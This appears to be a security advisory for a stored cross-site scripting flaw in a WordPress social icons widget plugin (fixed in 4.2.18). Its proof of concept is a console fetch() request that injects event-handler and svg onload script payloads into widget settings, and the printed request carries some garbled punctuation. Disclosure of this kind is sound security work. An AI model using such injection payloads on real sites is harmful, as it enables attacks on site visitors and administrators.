Social Icons Widget & Block < 4.2.18 - Admin+ Stored XSS

Description The plugin does not sanitise and escape some of its Widget settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

PoC

1. As an administrator, visit /wp-admin/widgets.php and add a Social Icons from WPZoom Widget 2. Open your browser’s console, and paste the following command: await fetch(“/wp-admin/admin-ajax.php”, { “credentials”: “include”, “headers”: { “Content-Type”: “application/x-www-form-urlencoded; charset=UTF-8”, }, “body”: widget-zoom-social-icons-widget%5B2%5D%5Btitle%5D=Follow+us&widget-zoom-social-icons-widget;%5B2%5D%5Bdescription%5D=asdasd&widget-zoom-social-icons-widget;%5B2%5D%5Bopen_new_tab%5D=true&widget-zoom-social-icons-widget;%5B2%5D%5Bicon_alignment%5D=none&widget-zoom-social-icons-widget;%5B2%5D%5Bicon_style%5D=with-canvas&widget-zoom-social-icons-widget;%5B2%5D%5Bicon_canvas_style%5D=round&widget-zoom-social-icons-widget;%5B2%5D%5Bicon_padding_size%5D=8&widget-zoom-social-icons-widget;%5B2%5D%5Bicon_font_size%5D=18&widget-zoom-social-icons-widget;%5B2%5D%5Bglobal_color_picker%5D=%231e73be&widget-zoom-social-icons-widget;%5B2%5D%5Bglobal_color_picker_hover%5D=%231e73be&widget-zoom-social-icons-widget;%5B2%5D%5Burl_fields%5D%5B%5D=https%3A%2F%2Ffacebook.com%2F&widget-zoom-social-icons-widget;%5B2%5D%5Blabel_fields%5D%5B%5D=Facebook&widget-zoom-social-icons-widget;%5B2%5D%5Bcolor_picker_fields%5D%5B%5D=123%22%20onmouseover=%27alert(/XSS/)%27&widget-zoom-social-icons-widget;%5B2%5D%5Bcolor_picker_hover_fields%5D%5B%5D=%230866FF&widget-zoom-social-icons-widget;%5B2%5D%5Bicon_fields%5D%5B%5D=facebook&widget-zoom-social-icons-widget;%5B2%5D%5Bicon_kit_fields%5D%5B%5D=socicon&widget-zoom-social-icons-widget;%5B2%5D%5Baria_label_fields%5D%5B%5D=%27%20%3e%3csvg/onload=alert(123)//%3e&widget-zoom-social-icons-widget;%5B2%5D%5Burl_fields%5D%5B%5D=https%3A%2F%2Fx.com%2F&widget-zoom-social-icons-widget;%5B2%5D%5Blabel_fields%5D%5B%5D=X&widget-zoom-social-icons-widget;%5B2%5D%5Bcolor_picker_fields%5D%5B%5D=%23000000&widget-zoom-social-icons-widget;%5B2%5D%5Bcolor_picker_hover_fields%5D%5B%5D=%23000000&widget-zoom-social-icons-widget;%5B2%5D%5Bicon_fields%5D%5B%5D=x&widget-zoom-social-icons-widget;%5B2%5D%5Bicon_kit_fields%5D%5B%5D=socicon&widget-zoom-social-icons-widget;%5B2%5D%5Baria_label_fields%5D%5B%5D=&widget-zoom-social-icons-widget;%5B2%5D%5Burl_fields%5D%5B%5D=https%3A%2F%2Finstagram.com%2F&widget-zoom-social-icons-widget;%5B2%5D%5Blabel_fields%5D%5B%5D=Instagram&widget-zoom-social-icons-widget;%5B2%5D%5Bcolor_picker_fields%5D%5B%5D=%23e4405f&widget-zoom-social-icons-widget;%5B2%5D%5Bcolor_picker_hover_fields%5D%5B%5D=%23e4405f&widget-zoom-social-icons-widget;%5B2%5D%5Bicon_fields%5D%5B%5D=instagram&widget-zoom-social-icons-widget;%5B2%5D%5Bicon_kit_fields%5D%5B%5D=socicon&widget-zoom-social-icons-widget;%5B2%5D%5Baria_label_fields%5D%5B%5D=&widget-id;=zoom-social-icons-widget-2&id;_base=zoom-social-icons-widget&widget-width;=250&widget-height;=200&widget;_number=-1&multi;_number=2&add;_new=&action;=save-widget&savewidgets;=${_wpnonce_widgets.value}&sidebar;=sidebar-1, “method”: “POST”, “mode”: “cors” }); 3. Visit the site’s homepage, and notice our test alert boxes are executing.